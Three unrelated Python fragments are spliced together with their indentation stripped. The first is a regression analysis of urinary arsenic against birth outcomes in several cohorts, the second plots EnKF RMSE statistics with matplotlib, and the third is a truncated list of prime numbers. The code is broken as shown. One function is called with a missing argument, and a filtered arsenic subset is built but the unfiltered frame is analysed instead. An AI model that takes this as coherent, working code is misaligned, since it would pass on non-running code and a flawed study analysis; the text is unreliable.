mdf = md.fit_vb()
return mdf.summary()
def crude_mixedMLbayse(df_merged, x_feature, y_feature, covars='False', logit = False):
#TODO: Replace covars variable with actual selection of indivdual features
df_merged = df_merged.replace(-9,np.nan).replace('-9',np.nan).replace(999,np.nan).replace(888,np.nan)
if covars == 'False':
data = df_merged[[x_feature,y_feature,'CohortType']].dropna(how = 'any', axis='rows')
fit_string = y_feature + '~' + x_feature
if covars == 'True':
data = add_confound(df_merged, x_feature, y_feature)
## create the model string for
fit_string = y_feature + '~'
cnt = 0
## filter out target, at birth, and reference dummy variables in model
for x in data.columns:
#data.drop(['education'], inplace = True, axis = 0)
if x != 'birthWt' and x !='Outcome_weeks' and x!= 'Outcome' and x != 'PIN_Patient' and x != 'SGA' and x != 'LGA' \
and x !='birthLen' and x != 'CohortType' and x != 'race' and x!='race_1' and x!= 'smoking' and x != 'smoking_3' \
and x != 'education_5' and x != 'education':
if cnt == 0:
fit_string += ' ' + x + ' '
else:
fit_string += ' + ' + x + ' '
cnt+=1
fit_string += '+ (1|CohortType)'
if logit == False:
model = bmb.Model(data)
results = model.fit(fit_string)
else:
model = bmb.Model(data)
results = model.fit(fit_string, family='bernoulli',link = 'logit')
## miced linear model with group variable = CohortType
mdf = az.summary(results)
return mdf
def verifyclean(df):
df = df.replace(-9,np.nan).replace('-9',np.nan).replace(999,np.nan).replace(888,np.nan)
return df
def add_confound(df_merged, x_feature, y_feature, conf):
print(df_merged.shape)
# check if confounders are added
if len(conf) > 1:
cols_to_mix = [x_feature, y_feature, 'PIN_Patient', 'CohortType'] + conf
else:
cols_to_mix = [x_feature, y_feature, 'PIN_Patient', 'CohortType']
# drop any missing values as mixed model requires complete data
df_nonan = df_merged[cols_to_mix].dropna(axis='rows')
#df_nonan['smoking'] = df_nonan['smoking'].astype(int)
print(df_nonan.shape)
## dummy race annd smoking varible
def add_cats(name, df_nonan, ref_val):
df_nonan[name] = df_nonan[name].astype('float').astype(int)
df = pd.concat([df_nonan, pd.get_dummies(df_nonan[name], prefix = name)], axis = 1)
#print(df.columns)
try:
df.drop([name,name + '_' + ref_val], inplace = True, axis = 1)
except:
pass
return df
if 'race' in conf: df_nonan = add_cats('race', df_nonan, '1')
if 'smoking' in conf: df_nonan = add_cats('smoking', df_nonan, '0')
if 'education' in conf: df_nonan = add_cats('education', df_nonan, '5')
return df_nonan
##text file writing function to shorten length of the code
def text_writing(name, frame, x_feat, y_feat, all_variables, path, output, txt_file_specifics, reg_type):
try:
text_file = open(path + txt_file_specifics, "w")
dims = frame.shape
text_file.write(str(frame[all_variables + [y_feat]].describe()))
text_file.write('\n')
text_file.write("Number of participants: {}\n".format(dims[0]))
text_file.write(str(output))
text_file.close()
except Exception as e:
text_file.write(reg_type + ' Error:*\n')
text_file.write(str(e))
text_file.close()
## main analysis
## with categories encoded
def runcustomanalysis1():
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
## Model 1: Restricted to participants with no fish/seafood consumption.
## Get data with no fish
df_NEU = adapters.neu.get_dataframe_nofish()
df_UNM = adapters.unm.get_dataframe_nofish()
df_DAR = adapters.dar.get_dataframe_nofish()
## merge data frames
df_NEUUNM = merge2CohortFrames(df_NEU,df_UNM)
df_NEUDAR = merge2CohortFrames(df_NEU,df_DAR)
df_UNMDAR = merge2CohortFrames(df_UNM,df_DAR)
df_merged_3 = merge3CohortFrames(df_NEU,df_UNM,df_DAR)
frames_for_analysis = [
('NEU', df_NEU),
('UNM', df_UNM),
('DAR', df_DAR),
('NEUUNM', df_NEUUNM),
('NEUDAR', df_NEUDAR),
('UNMDAR', df_UNMDAR),
('UNMDARNEU', df_merged_3),
]
for name, df in frames_for_analysis:
print('Data Stats')
print(name)
print(df.shape)
#set analysis parameters
x_feature = 'UTAS'
covars = 'babySex|BMI|parity|smoking|education'
all_vars = covars.split('|') + [x_feature]
Y_features_continous = ['Outcome_weeks','birthWt', 'headCirc', 'birthLen']
Y_features_binary = ['LGA','SGA','Outcome']
# set output paths for results:
output_path_model1_adj = '/usr/src/app/mediafiles/analysisresults/model1adj/'
output_path_model1_noadj = '/usr/src/app/mediafiles/analysisresults/model1noadj/'
try:
os.mkdir(output_path_model1_adj)
os.mkdir(output_path_model1_noadj)
except:
print('Exists')
# start analysis
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_adj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature), 'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_adj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#without adjustment
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_noadj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model1_noadj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#Model 2: Restricted to participants with arsenic speciation data.
## Get data with fish
df_UNM = adapters.unm.get_dataframe()
df_DAR = adapters.dar.get_dataframe_pred()
## merge data frames
df_UNMDAR = merge2CohortFrames(df_UNM,df_DAR)
frames_for_analysis = [
('UNM', df_UNM),
('DAR', df_DAR),
('UNMDAR', df_UNMDAR)
]
for name, df in frames_for_analysis:
print('Data Stats')
print(name)
print(df.shape)
x_feature = 'UTAS'
covars = 'babySex|BMI|parity|smoking|education'
all_vars = covars.split('|') + [x_feature]
Y_features_continous = ['Outcome_weeks','birthWt', 'headCirc', 'birthLen']
Y_features_binary = ['LGA','SGA','Outcome']
output_path_model2_adj = '/usr/src/app/mediafiles/analysisresults/model2adj/'
output_path_model2_noadj = '/usr/src/app/mediafiles/analysisresults/model2noadj/'
#output_path = '../mediafiles/analysisresults/'
try:
os.mkdir(output_path_model2_adj)
os.mkdir(output_path_model2_noadj)
except:
print('Exists')
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output= crude_reg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_adj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_adj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#without adjustment
for name, frame in frames_for_analysis:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_noadj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'False', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model2_noadj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#Model 3: Restricted to arsenic speciation data with AsB ≤1 µg/L.
x_feature = 'UTAS'
covars = 'babySex|BMI|parity|smoking|education'
all_vars = covars.split('|') + [x_feature]
Y_features_continous = ['Outcome_weeks','birthWt', 'headCirc', 'birthLen']
Y_features_binary = ['LGA','SGA','Outcome']
## Number of Participants
output_path_model3_adj = '/usr/src/app/mediafiles/analysisresults/model3adj/'
output_path_model3_noadj = '/usr/src/app/mediafiles/analysisresults/model3noadj/'
#output_path = '../mediafiles/analysisresults/'
try:
os.mkdir(output_path_model3_adj)
os.mkdir(output_path_model3_noadj)
except:
print('Exists')
# remove the AsB <= 1
df_UNM = df_UNM[df_UNM['UASB'] <= 1]
df_DAR = df_DAR[df_DAR['UASB'] <= 1]
df_UNMDAR_UASB = df_UNMDAR[df_UNMDAR['UASB'] <= 1]
frames_for_analysis3 = [
('UNM', df_UNM),
('DAR', df_DAR),
('UNMDAR', df_UNMDAR)
]
for name, frame in frames_for_analysis3:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
for y_feature in Y_features_continous:
output = crude_reg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model3_adj, output, "linear_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Linear Regression')
for y_feature in Y_features_binary:
output = crude_logreg(frame, x_feature, y_feature, covars, 'True', 'csv', True)
text_writing(name, frame, x_feature, y_feature, all_vars, output_path_model3_adj, output, "logistic_reg_{}_{}_log({}).txt".format(name, y_feature, x_feature),'Logistic Regression')
#no adj
for name, frame in frames_for_analysis3:
print('Min: {} Max: {}'.format(frame['UTAS'].min(), frame['UTAS'].max()))
frame = frame[(frame['UTAS'] > 0) & (~frame['UTAS'].isna())]
| |
from matplotlib import colors
import numpy as np
import matplotlib.pyplot as plt
from pskf.tools.run import pythonmodule as pm
from pskf.tools.plot import plotarrays as pa
from pskf.scripts.errorplot import arrays as ea
###############################################################################
# Errorplot RMSE point plot #
###############################################################################
def plot(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
ensemble_sizes=[50, 70, 100, 250],
axistitle='',
model='wavebc',
is_std=False,
lineyval=0.62,
std_method='std',
pic_format='pdf',
figpos=[0.15, 0.3, 0.8, 0.6],
xlim_min=0,
xlim_max=None,
ylims=[0.28, 0.82],
is_textpos_auto=True,
textpos=[0.7, 0.6, 0.5, 0.4],
xdiff_nens=0.5,
yticks=[0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1],
ylabel=r'RMSE $\log(K[\mathrm{m}^2])$',
num_pack=4, # Number of methods in pack
is_text=False,
text_x=0.5,
text_y=0.5,
n_syn=1000,
legend_input=None,
formatsos=['o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p'],
coleros=[(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0)],
markersize=[10 for i in range(32)],
markeredgesize=1.5,
fontleg=30,
fonttit=40,
fontlab=40,
fonttic=30,
):
"""
A plotting function for statistics of residual distributions.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
model : string
'wavebc' - Model wavebc
'wave' - Model wave
is_std : boolean
True - Show errorbars of standard deviation
False - No errorbars
std_method : string
Standard deviation to use
'std' - Standard deviation
'stdm' - Standard deviation of mean
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
The remaining keyword arguments control additional plot styling (markers, colors, marker sizes, font sizes, etc.).
Returns
-------
ax : Axes
Axes containing plot.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
for enssize in ensemble_sizes:
if enssize not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError(
'Wrong ensemble size.'
)
# Title
ax.set_title(axistitle, size=fonttit)
# Number of methods
num_methods = len(which_methods)
# Default legend input
if legend_input is None:
legend_input = pa.longnames_methods
legend_input = np.array([legend_input[i].ljust(18)
for i in which_methods])
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'
))
# Load standard deviation
if is_std:
std = np.load(pm.py_output_filename(
'errorplot',
which_res,
std_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
ax.set_prop_cycle("color", ['k'])
ax.set_position(figpos)
for iens, enssize in enumerate(ensemble_sizes):
# x positions, up to 15 methods
x = np.delete(np.arange(0, 100),
np.arange(0, 100, num_pack+1))
# Skip one after num_pack+1 entries for vertical line
resplot = res[:, iens]
if is_std:
stdplot = std[:, iens]
# Plot
puntos = [] # Contains plotted points
ax.plot(x[:len(resplot)], resplot, 'k-', label=3)
for iplot in range(num_methods):
# Points
punto, = ax.plot(
x[iplot],
resplot[iplot],
formatsos[iplot],
lw=2,
ms=markersize[iplot],
label=legend_input[iplot],
c=coleros[iplot], mew=markeredgesize,
mec='black'
)
puntos.append(punto)
# Text
if iplot == num_methods-1:
ax.text(
x[iplot]+xdiff_nens,
resplot[iplot] if is_textpos_auto else textpos[iens],
r'$n_{e}$='+str(enssize),
verticalalignment='center',
horizontalalignment='left',
size=20,
)
# Error
if is_std:
ax.errorbar(
x[iplot],
resplot[iplot],
yerr=stdplot[iplot],
fmt=formatsos[iplot],
lw=2,
ms=markersize[iplot],
label='this',
mfc=coleros[iplot],
mew=markeredgesize,
mec='black'
)
# Legend
num_inleg = num_pack # Methods per legend (except last)
num_legs = int(num_methods/num_inleg
+ int(bool(np.mod(num_methods,
num_inleg)))) # Number of legends
num_inlastleg = (np.mod(num_methods, num_inleg)
if np.mod(num_methods, num_inleg) else
num_inleg) # Methods in last legend
leginds = [num_inleg-1+i*num_inleg
if i < num_legs-1 else
num_inleg-1+(i-1)*num_inleg+num_inlastleg
for i in range(num_legs)] # last method ind in each legend
legranges = [num_inleg if i < num_legs-1 else num_inlastleg
for i in range(num_legs)] # Methods in each legend
for ileg in range(num_legs):
xleg = figpos[0] + ileg*figpos[2]/num_legs
my_legend = ax.legend(
handles=[puntos[i]
for i in range(leginds[ileg]-legranges[ileg]+1,
leginds[ileg]+1)],
bbox_to_anchor=[xleg,
0.00,
figpos[2]/num_legs,
0.3],
bbox_transform=plt.gcf().transFigure,
# loc=[0.0, 1.0],
mode='expand',
# labelspacing=1.0,
ncol=1,
numpoints=1,
fontsize=fontleg,
framealpha=1.0,
markerscale=1.0
)
ax.add_artist(my_legend)
# Lines
for xline in range(0, 100, num_pack+1):
ax.vlines(xline, 0.0, 1.0, linestyles='dotted')
for yline in yticks:
ax.hlines(yline, 0, 100, linestyles='dotted')
ax.hlines(lineyval, 0, 100, linestyles='dashed')
# Text: Model name and n_syn in box
if is_text:
model_spec = ' Tracer ' if model == 'wavereal' else ' Well '
ax.text(
text_x, text_y,
model_spec+'\n'
+ r' $n_{syn}$: '+str(n_syn).rjust(4),
linespacing=1.5,
fontsize=30,
bbox={'facecolor': (0.8, 0.8, 0.8), 'alpha': 1.0, 'pad': 10},
)
# Style
ax.set_xlim([xlim_min, (num_legs*(num_pack+1) if xlim_max is None
else xlim_max)])
ax.set_ylabel(ylabel,
fontsize=fontlab,
labelpad=10)
ax.tick_params(direction='in', length=6,
width=1, labelsize=fonttic,
top=False, right=False, bottom=False,
pad=8)
ax.set_xticks([])
ax.set_yticks(yticks)
ax.get_xaxis().set_visible(False)
ax.set_ylim(ylims)
# Saving location
pic_name = pm.py_output_filename(
ea.tag,
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
pic_format
)
return ax, pic_name
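# A minimal usage sketch (assumes the precomputed residual arrays referenced
# via pm.py_output_filename() already exist on disk for the chosen methods,
# model and ensemble sizes):
#     import matplotlib.pyplot as plt
#     fig = plt.figure(figsize=(16, 10))
#     ax = fig.add_subplot(111)
#     ax, pic_name = plot(ax, which_methods=[0, 1, 2, 3], model='wavebc',
#                         ensemble_sizes=[50, 70, 100, 250])
#     fig.savefig(pic_name, format='pdf')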
###############################################################################
# Matrix plot of RMSE quotients #
###############################################################################
def quots(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
model='wavebc',
ensemble_sizes=[50, 70, 100, 250],
ensemble_size=50,
pic_format='pdf',
is_text=False,
axistitle='',
fonttit=40,
figpos=[0.32, 0.2, 0.6, 0.8],
ticksize=20,
):
"""
A function plotting a grid of quotients of
statistical measures.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
model : string
'wavebc' - Model wavebc
'wave' - Model wave
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
The remaining keyword arguments control additional plot styling (title font size, tick label size, etc.).
Returns
-------
ax : Axes
Axes containing quotient matrix.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
if ensemble_size not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError('ensemble_size wrong')
# Title
ax.set_title(axistitle, size=fonttit)
# Number of compared methods
num_methods = len(which_methods)
# Ensemble size translated to index
iens = pa.indens[model][ensemble_size]
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
# Calculate and sort quots
quots = np.array(
[[res[i1, iens]/res[i2, iens] for i1 in range(num_methods)]
for i2 in range(num_methods)]
)
ax.set_position(figpos)
# White Rectangles
for ipm in range(num_methods):
for jpm in range(num_methods):
# Diagonal black
if ipm == jpm:
quots[ipm, jpm] = 0.0
# Upper triangle white
if ipm < jpm:
quots[ipm, jpm] = None
ax.imshow(
quots,
interpolation='nearest',
cmap='Greys_r',
norm=colors.Normalize(vmin=0.8, vmax=1.0, clip=False)
)
# Plot: Mostly ticks
ax.set_xticks([i for i in range(num_methods)])
ax.set_xticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize,
rotation=90)
ax.set_yticks([i for i in range(num_methods)])
ax.set_yticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize)
ax.tick_params(length=0)
ax.set_frame_on(False)
# Text
for itext in range(num_methods):
for jtext in range(num_methods):
if itext < jtext:
ntext = quots[jtext, itext]
ttext = str(ntext)[0:4]
px = itext-0.35
py = jtext+0.15
colero = 'white' if ntext < 0.9 else 'black'
ax.text(px, py, ttext, color=colero, fontsize=25)
905299, 905329, 905339, 905347, 905381,
905413, 905449, 905453, 905461, 905477, 905491, 905497, 905507,
905551, 905581, 905587, 905599, 905617, 905621, 905629, 905647,
905651, 905659, 905677, 905683, 905687, 905693, 905701, 905713,
905719, 905759, 905761, 905767, 905783, 905803, 905819, 905833,
905843, 905897, 905909, 905917, 905923, 905951, 905959, 905963,
905999, 906007, 906011, 906013, 906023, 906029, 906043, 906089,
906107, 906119, 906121, 906133, 906179, 906187, 906197, 906203,
906211, 906229, 906233, 906259, 906263, 906289, 906293, 906313,
906317, 906329, 906331, 906343, 906349, 906371, 906377, 906383,
906391, 906403, 906421, 906427, 906431, 906461, 906473, 906481,
906487, 906497, 906517, 906523, 906539, 906541, 906557, 906589,
906601, 906613, 906617, 906641, 906649, 906673, 906679, 906691,
906701, 906707, 906713, 906727, 906749, 906751, 906757, 906767,
906779, 906793, 906809, 906817, 906823, 906839, 906847, 906869,
906881, 906901, 906911, 906923, 906929, 906931, 906943, 906949,
906973, 907019, 907021, 907031, 907063, 907073, 907099, 907111,
907133, 907139, 907141, 907163, 907169, 907183, 907199, 907211,
907213, 907217, 907223, 907229, 907237, 907259, 907267, 907279,
907297, 907301, 907321, 907331, 907363, 907367, 907369, 907391,
907393, 907397, 907399, 907427, 907433, 907447, 907457, 907469,
907471, 907481, 907493, 907507, 907513, 907549, 907561, 907567,
907583, 907589, 907637, 907651, 907657, 907663, 907667, 907691,
907693, 907703, 907717, 907723, 907727, 907733, 907757, 907759,
907793, 907807, 907811, 907813, 907831, 907843, 907849, 907871,
907891, 907909, 907913, 907927, 907957, 907967, 907969, 907997,
907999, 908003, 908041, 908053, 908057, 908071, 908081, 908101,
908113, 908129, 908137, 908153, 908179, 908183, 908197, 908213,
908221, 908233, 908249, 908287, 908317, 908321, 908353, 908359,
908363, 908377, 908381, 908417, 908419, 908441, 908449, 908459,
908471, 908489, 908491, 908503, 908513, 908521, 908527, 908533,
908539, 908543, 908549, 908573, 908581, 908591, 908597, 908603,
908617, 908623, 908627, 908653, 908669, 908671, 908711, 908723,
908731, 908741, 908749, 908759, 908771, 908797, 908807, 908813,
908819, 908821, 908849, 908851, 908857, 908861, 908863, 908879,
908881, 908893, 908909, 908911, 908927, 908953, 908959, 908993,
909019, 909023, 909031, 909037, 909043, 909047, 909061, 909071,
909089, 909091, 909107, 909113, 909119, 909133, 909151, 909173,
909203, 909217, 909239, 909241, 909247, 909253, 909281, 909287,
909289, 909299, 909301, 909317, 909319, 909329, 909331, 909341,
909343, 909371, 909379, 909383, 909401, 909409, 909437, 909451,
909457, 909463, 909481, 909521, 909529, 909539, 909541, 909547,
909577, 909599, 909611, 909613, 909631, 909637, 909679, 909683,
909691, 909697, 909731, 909737, 909743, 909761, 909767, 909773,
909787, 909791, 909803, 909809, 909829, 909833, 909859, 909863,
909877, 909889, 909899, 909901, 909907, 909911, 909917, 909971,
909973, 909977, 910003, 910031, 910051, 910069, 910093, 910097,
910099, 910103, 910109, 910121, 910127, 910139, 910141, 910171,
910177, 910199, 910201, 910207, 910213, 910219, 910229, 910277,
910279, 910307, 910361, 910369, 910421, 910447, 910451, 910453,
910457, 910471, 910519, 910523, 910561, 910577, 910583, 910603,
910619, 910621, 910627, 910631, 910643, 910661, 910691, 910709,
910711, 910747, 910751, 910771, 910781, 910787, 910799, 910807,
910817, 910849, 910853, 910883, 910909, 910939, 910957, 910981,
911003, 911011, 911023, 911033, 911039, 911063, 911077, 911087,
911089, 911101, 911111, 911129, 911147, 911159, 911161, 911167,
911171, 911173, 911179, 911201, 911219, 911227, 911231, 911233,
911249, 911269, 911291, 911293, 911303, 911311, 911321, 911327,
911341, 911357, 911359, 911363, 911371, 911413, 911419, 911437,
911453, 911459, 911503, 911507, 911527, 911549, 911593, 911597,
911621, 911633, 911657, 911663, 911671, 911681, 911683, 911689,
911707, 911719, 911723, 911737, 911749, 911773, 911777, 911783,
911819, 911831, 911837, 911839, 911851, 911861, 911873, 911879,
911893, 911899, 911903, 911917, 911947, 911951, 911957, 911959,
911969, 912007, 912031, 912047, 912049, 912053, 912061, 912083,
912089, 912103, 912167, 912173, 912187, 912193, 912211, 912217,
912227, 912239, 912251, 912269, 912287, 912337, 912343, 912349,
912367, 912391, 912397, 912403, 912409, 912413, 912449, 912451,
912463, 912467, 912469, 912481, 912487, 912491, 912497, 912511,
912521, 912523, 912533, 912539, 912559, 912581, 912631, 912647,
912649, 912727, 912763, 912773, 912797, 912799, 912809, 912823,
912829, 912839, 912851, 912853, 912859, 912869, 912871, 912911,
912929, 912941, 912953, 912959, 912971, 912973, 912979, 912991,
913013, 913027, 913037, 913039, 913063, 913067, 913103, 913139,
913151, 913177, 913183, 913217, 913247, 913259, 913279, 913309,
913321, 913327, 913331, 913337, 913373, 913397, 913417, 913421,
913433, 913441, 913447, 913457, 913483, 913487, 913513, 913571,
913573, 913579, 913589, 913637, 913639, 913687, 913709, 913723,
913739, 913753, 913771, 913799, 913811, 913853, 913873, 913889,
913907, 913921, 913933, 913943, 913981, 913999, 914021, 914027,
914041, 914047, 914117, 914131, 914161, 914189, 914191, 914213,
914219, 914237, 914239, 914257, 914269, 914279, 914293, 914321,
914327, 914339, 914351, 914357, 914359, 914363, 914369, 914371,
914429, 914443, 914449, 914461, 914467, 914477, 914491, 914513,
914519, 914521, 914533, 914561, 914569, 914579, 914581, 914591,
914597, 914609, 914611, 914629, 914647, 914657, 914701, 914713,
914723, 914731, 914737, 914777, 914783, 914789, 914791, 914801,
914813, 914819, 914827, 914843, 914857, 914861, 914867, 914873,
914887, 914891, 914897, 914941, 914951, 914971, 914981, 915007,
915017, 915029, 915041, 915049, 915053, 915067, 915071, 915113,
915139, 915143, 915157, 915181, 915191, 915197, 915199, 915203,
915221, 915223, 915247, 915251, 915253, 915259, 915283, 915301,
915311, 915353, 915367, 915379, 915391, 915437, 915451, 915479,
915487, 915527, 915533, 915539, 915547, 915557, 915587, 915589,
915601, 915611, 915613, 915623, 915631, 915641, 915659, 915683,
915697, 915703, 915727, 915731, 915737, 915757, 915763, 915769,
915799, 915839, 915851, 915869, 915881, 915911, 915917, 915919,
915947, 915949, 915961, 915973, 915991, 916031, 916033, 916049,
916057, 916061, 916073, 916099, 916103, 916109, 916121, 916127,
916129, 916141, 916169, 916177, 916183, 916187, 916189, 916213,
916217, 916219, 916259, 916261, 916273, 916291, 916319, 916337,
916339, 916361, 916367, 916387, 916411, 916417, 916441, 916451,
916457, 916463, 916469, 916471, 916477, 916501, 916507, 916511,
916537, 916561, 916571, 916583, 916613, 916621, 916633, 916649,
916651, 916679, 916703, 916733, 916771, 916781, 916787, 916831,
916837, 916841, 916859, 916871, 916879, 916907, 916913, 916931,
916933, 916939, 916961, 916973, 916999, 917003, 917039, 917041,
917051, 917053, 917083, 917089, 917093, 917101, 917113, 917117,
917123, 917141, 917153, 917159, 917173, 917179, 917209, 917219,
917227, 917237, 917239, 917243, 917251, 917281, 917291, 917317,
917327, 917333, 917353, 917363, 917381, 917407, 917443, 917459,
917461, 917471, 917503, 917513, 917519, 917549, 917557, 917573,
917591, 917593, 917611, 917617, 917629, 917633, 917641, 917659,
917669, 917687, 917689, 917713, 917729, 917737, 917753, 917759,
917767, 917771, 917773, 917783, 917789, 917803, 917809, 917827,
917831, 917837, 917843, 917849, 917869, 917887, 917893, 917923,
917927, 917951, 917971, 917993, 918011, 918019, 918041, 918067,
918079, 918089, 918103, 918109, 918131, 918139, 918143, 918149,
918157, 918161, 918173, 918193, 918199, 918209, 918223, 918257,
918259, 918263, 918283, 918301, 918319, 918329, 918341, 918347,
918353, 918361, 918371, 918389, 918397, 918431, 918433, 918439,
918443, 918469, 918481, 918497, 918529, 918539, 918563, 918581,
918583, 918587, 918613, 918641, 918647, 918653, 918677, 918679,
918683, 918733, 918737, 918751, 918763, 918767, 918779, 918787,
918793, 918823, 918829, 918839, 918857, 918877, 918889, 918899,
918913, 918943, 918947, 918949, 918959, 918971, 918989, 919013,
919019, 919021, 919031, 919033, 919063, 919067, 919081, 919109,
919111, 919129, 919147, 919153, 919169, 919183, 919189, 919223,
919229, 919231, 919249, 919253, 919267, 919301, 919313, 919319,
919337, 919349, 919351, 919381, 919393, 919409, 919417, 919421,
919423, 919427, 919447, 919511, 919519, 919531, 919559, 919571,
